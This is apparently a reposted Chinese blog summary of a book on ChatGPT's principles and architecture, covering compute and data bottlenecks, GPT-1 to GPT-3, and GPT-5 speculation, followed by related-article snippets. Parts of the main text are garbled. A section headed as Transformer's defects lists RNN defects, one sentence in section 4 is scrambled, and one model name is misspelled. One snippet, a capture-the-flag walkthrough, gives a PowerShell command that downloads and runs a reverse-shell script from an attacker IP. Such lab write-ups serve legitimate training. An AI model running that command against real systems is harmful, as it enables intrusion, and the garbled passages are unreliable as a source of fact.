大模型相关:ChatGPT的原理与架构

一、大模型面临的挑战

1.1 Transformer模型的缺陷:

与RNN相比Transformer面临以下挑战:

  1. 并行计算能力不足。RNN需要按序处理序列数据中的每个时间步,这限制了它在训练过程中充分利用现代GPU的并行计算能力,从而影响训练效率。
  2. 长程依赖问题。尽管LSTM和GRU在处理长程依赖上比基本的RNN更为出色但在处理非常长的序列时,它们依然存在困难。
  3. 模型容量限制。LSTM和GRU的模型容量相对较小,这在大语言模型训练中限制了模型的规模,使获取更丰富的语义信息和构建更复杂的表示变得困难。

Transformer模型的结构如下图所示:
Transformer模型结构

1.2 大模型发展的三个瓶颈

算力瓶颈

  • 预训练阶段:chatGPT 3.5参数量1750亿以上,显存占用350G~500G,预训练需要1000个以上的A100 GPU算力。单次训练成本500万美元
  • 推理与部署阶段1750亿,假设有1300万个日活跃用户,每个GPU每小时成本1美元,日均计算硬件成本69万美元,每次查询成本0.69美分

数据瓶颈

  • LLaMA使用数据集4.6TB
  • GPT-3使用数据集45TB(文本)
  • 全球最大中文语料库WuDaoCorpora:3TB,公开200G

工程瓶颈

专业研究人员和工程师的技能标准要求高、培养和雇佣成本高

二、大模型的评估

GPT-4的智能水平可从以下几个关键方面进行评估:

  1. 任务表现
  2. 知识理解与应用
  3. 泛化能力
  4. 自主学习和推理能力

三、大模型的演变和架构

3.1 GPT-1

GPT-1的模型架构如下图所示:
在这里插入图片描述

3.2 GPT-2

GPT-2模型的自回归过程:
在这里插入图片描述

3.3 GPT-3

GPT-3的模型架构示意图:
在这里插入图片描述

3.4 GPT系列

总结GPT的技术栈和模型结构。
大语言模型的技术栈如下图所示:
在这里插入图片描述
GPT系列的模型架构示意图:

3.5 应用流程

在这里插入图片描述

四、大模型的未来发展

在探索GPT-5及后续版本的可能性与发展前景时,有几个关键因素必须予以重点考数据量数据质量以及数据来源。这些可能决定了GPT-5及后续版本是否能够接近虑:或超越人类智能的关键要素

4.1 数据量

有媒体开始预测GPT-5的发布日期,并预测GPT-5在多模态处理能力方面将有重大突破。据现有资料表明,GPT-5可能会在约25000个GPU的规模上进行训练。据TechRadar的报道,ChachiBT已经在10000个性能超越A100 GPU的NVIDIA GPU上进行了训练。对于GPT-5的发布时间,GeordieRybass的预测可以作为参考,他预测GPT-5或类似模型可能在2024年春末或初夏发布。
一项对 DeepMind研究的总结指出,模型的参数规模与训练数据量之间存在一种优化平衡。例如,GPT-3和Palm 等模型的参数数量远超出其实际需求,它们实际上更需要大量高质量的数据。
因此,GPT-4需要1万亿参数的说法似乎并不准确。事实上,GPT-5的参数可能与GPT-4相同,甚至可能更少。根据2022年7月的一篇LessWrong博客文章,当前的语言建模性能主要受到数据量的限制,而不是模型规模。只要获得足够多的数据,就无须运行拥有5000亿参数,甚至1万亿或更大规模参数的模型。

4.2 数据质量

在GPT模型的提升过程中,数据质量至关重要,然而,获取高质量的数据仍然是一个挑战。目前,GPT-3和其他一些模型在大约3000亿个token上进行了训练。考虑到DeepMind的 Chinchila模型在大约1.4万亿个token上进行了训练,GPT-5在数据量方面可能会有显著的提升。高质量数据的已知来源包括科学论文、书籍、网络爬取的内容新闻、代码以及维基百科。目前已知的高质量数据大约在4.6万亿17万亿个词之间。这表明距离耗尽高质量数据仅有一个数量级的距离,这种情况可能出现在2023-2027年,对人工智能的近期发展将产生深远影响。

4.3 数据来源

此外,数据来源的不确定性仍是一个问题。例如,Google和OpenAI并未透露他们的数据来源,可能是为了避免所有权和补偿的争议。同时,随着AI图像生成等领域的法律问题日益突出,确定数据来源将成为重要议题。尽管如此,GPT-5仍然会借鉴过去的经验,尽可能获取更多的高质量数据。自GPT-4交给微软以来,在没有进一步提高数据利用或提取效率的情况下,高质量数据的存量每年增长约10%

4.4 技术突破

除数据问题以外,GPT-5在各方面都有可能取得技术突破。一方面,研究者或许能发现从质量较低的数据源中提取高质量数据的方法。另一方面,引入自动化链式思维引导(ChainofThoughtPrompting)策略,有望显著提升模型的表现。尽管性能和成本因素可能限制模型训练,但多轮利用同一数据训练模型是行之有效的策略。人工生成并筛选数据集也是一个提升模型在复杂数学问题等方面表现的有效方法。
如果GPT-5能有效利用9万亿高质量token数据,其性能预期将实现数量级的提升这可能对就业市场产生深远影响。在阅读理解、逻辑和批判性思考、高中物理以及数学等领域,GPT-5有望超过人类评估者。并且,随着文本到语音、图像到文本、文本到图像以及文本到视频虚拟形象等技术的进步,AI教师的出现可能近在咫尺。然而,GPT-5的发布时间尚不确定,其中一个原因是它的发布可能取决于OpenAl内部的安全研究进展。OpenAI的首席执行官Sam Altman表示,只有在完成对齐工作、进行安全考量并与外部审计机构合作之后,相关模型才会发布。

参考文献

ChatGPT原理与架构:大模型的预训练、迁移和中间件编程 程戈 著 机械工业出版社 2023年12月

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/25157.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Llama模型家族之Stanford NLP ReFT源代码探索 (二)Intervention Layers层

LlaMA 3 系列博客 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (一) 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (二) 基于 LlaMA 3 LangGraph 在windows本地部署大模型 (三) 基于 LlaMA…

simulink中显示模块中的名字

simulink/matlab version: R2022a 改动前:X那里没有显示名字; 改动方法: 1)鼠标左键点击待显示模块; 2)菜单栏新增 模块这个选项; 3)点击自动名称; 4) 点击名称打开…

Linux 内核参数-相关介绍

Linux 内核参数-相关介绍 今天,介绍Linux内核参数相关内容。由于Linux内核优化需要根据具体需求进行具体优化,同时需要具备一定经验,所以这里不涉及优化操作内容。 不过,遇到面试中有相关题目,不至于答不上来&#x…

leetcode-04-[24]两两交换链表中的节点[19]删除链表的倒数第N个节点[160]相交链表[142]环形链表II

一、[24]两两交换链表中的节点 重点:暂存节点 class Solution {public ListNode swapPairs(ListNode head) {ListNode dummyHeadnew ListNode(-1);dummyHead.nexthead;ListNode predummyHead;//重点:存节点while(pre.next!null&&pre.next.next…

你好GPT-4o——对GPT-4o发布的思考与看法

你好GPT-4o 前言 2024年5月13日,OpenAI官网发布了他们的新一代自然语言处理交互系统——GPT-4o。这是OpenAI继GPT4之后又一个新的旗舰模型。 GPT-4o(“o”代表“omni”)是迈向更自然的人机交互的一步——它接受文本、音频、图像和视频的任意…

单源最短路径算法 -- 迪杰斯科拉(Dijkstra)算法

1. 简介 迪杰斯科拉(Dijkstra)算法是一种用于在加权图中找到最短路径的经典算法。它是由荷兰计算机科学家Edsger Wybe Dijkstra在1956年首次提出的,并以他的名字命名。这个算法特别适合于解决单源最短路径问题,即计算图中一个顶点…

保姆级讲解 Redis的理论与实践

文章目录 Redis学习笔记一 、Redis简介1.1 什么是Redis1.2 NoSQL1.3 NoSQL的类别1.4 总结:1.5 Redis 描述1.6 Redis的特点1.7 Redis的应用场景1.8 Redis总结 二、Redis安装2.1 Redis官网2.2 Redis 安装2.3 安装gcc2.4 安装Redis2.5 安装到指定的位置 三 、Redis启动…

深入理解C语言:main函数的奥秘

在C语言中,main函数是每个程序的入口点,起着至关重要的作用。本文将深入探讨main函数的工作原理,包括其参数、返回值、以及如何从main启动程序的执行。通过实际代码示例,读者将更深入地理解main函数在C语言编程中的核心地位。 第一…

安装 JDK 17

安装包 百度网盘 提取码:6666 安装步骤 双击下载得到的安装包,开始安装: 正在安装: 安装完成: 安装路径下,多出来了很多新的内容。安装文件夹所包含的内容及作用: src 是 JDK 的源码包。类库…

【vue实战项目】通用管理系统:图表功能

目录 前言 1.概述 2.数据概览页 2.1.柱状图 2.2.折线图 2.3.地图 前言 本文是博主前端Vue实战系列中的一篇文章,本系列将会带大家一起从0开始一步步完整的做完一个小项目,让你找到Vue实战的技巧和感觉。 专栏地址: https://blog.csd…

Golang | Leetcode Golang题解之第134题加油站

题目&#xff1a; 题解&#xff1a; func canCompleteCircuit(gas []int, cost []int) int {for i, n : 0, len(gas); i < n; {sumOfGas, sumOfCost, cnt : 0, 0, 0for cnt < n {j : (i cnt) % nsumOfGas gas[j]sumOfCost cost[j]if sumOfCost > sumOfGas {break}…

openai 前员工释放出关于AGI的前世今生和未来发展趋势的详细报告

目录 1.引言2.AGI的临近3.投资与工业动员4.国家安全与AI竞赛5.技术挑战与机遇6.项目与政策7.结语8.原文PDF链接PS.扩展阅读ps1.六自由度机器人相关文章资源ps2.四轴机器相关文章资源ps3.移动小车相关文章资源 1.引言 2024年&#xff0c;我们站在了一个全新的科技前沿。在这篇文…

如何做好电子内窥镜的网络安全管理?

电子内窥镜作为一种常用的医疗器械&#xff0c;其网络安全管理对于保护患者隐私和医疗数据的安全至关重要。以下是一些基本原则和步骤&#xff0c;用于确保电子内窥镜的网络安全&#xff1a; 1. 数据加密 为了防止数据泄露&#xff0c;电子内窥镜在传输患者图像数据时应采取有…

Docker的资源限制

文章目录 一、什么是资源限制1、Docker的资源限制2、内核支持Linux功能3、OOM异常4、调整/设置进程OOM评分和优先级4.1、/proc/PID/oom_score_adj4.2、/proc/PID/oom_adj4.3、/proc/PID/oom_score 二、容器的内存限制1、实现原理2、命令格式及指令参数2.1、命令格式2.2、指令参…

htb-window-4-Optimum-HttpFileServer 2.3

nmap exploit-HttpFileServer 2.3 生成ps1反弹shell 模拟漏洞案例的请求 python 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString(http://10.10.16.5/reverse.ps1)"获取flag s…

selenium-java自动化教程

文章目录 Selenium支持语言WebDriver 开始使用chromedriver模拟用户浏览访问模拟点击事件关闭弹窗&#xff0c;选中元素并点击 获取页面文本结语 Selenium Selenium是一个自动化测试工具&#xff0c;可以模拟用户操作web端浏览器的行为&#xff0c;包括点击、输入、选择等。也可…

Linux---进程/磁盘管理

文章目录 目录 文章目录 一.Linux中进程的概念 二.显示系统执行的进程 2.1: ps 命令 2.2 top 命令 三.终止进程 四.磁盘分区 一.Linux中进程的概念 在Linux中&#xff0c;进程是指操作系统中正在执行的程序的实例。每个进程都由操作系统分配了独立的内存空间&#xff0c;用于…

[数据集][目标检测]足球场足球运动员身份识别足球裁判员数据集VOC+YOLO格式312张4类别

数据集格式&#xff1a;Pascal VOC格式YOLO格式(不包含分割路径的txt文件&#xff0c;仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数)&#xff1a;312 标注数量(xml文件个数)&#xff1a;312 标注数量(txt文件个数)&#xff1a;312 标注类别…

调查显示各公司在 IT 安全培训方面存在差距

网络安全提供商 Hornetsecurity 最近进行的一项调查显示&#xff0c;许多组织的 IT 安全培训存在严重缺陷。 这项调查是在伦敦举行的 Infosecurity Europe 2024 期间发布的&#xff0c;调查发现 26% 的组织没有为其最终用户提供任何 IT 安全培训。 这些调查结果来自世界各地的…

阿里云活动推荐:AI 应用 DevOps 新体验

活动简介 阿里云新活动&#xff0c;体验阿里云的云效应用交付平台。体验了下&#xff0c;总体感觉还不错。平台把常规的开发过程封装成了模板&#xff0c;部署发布基本都是一键式操作&#xff0c;并且对自定义支持的比较好。 如果考虑将发布和部署搬到云上&#xff0c;可以玩一…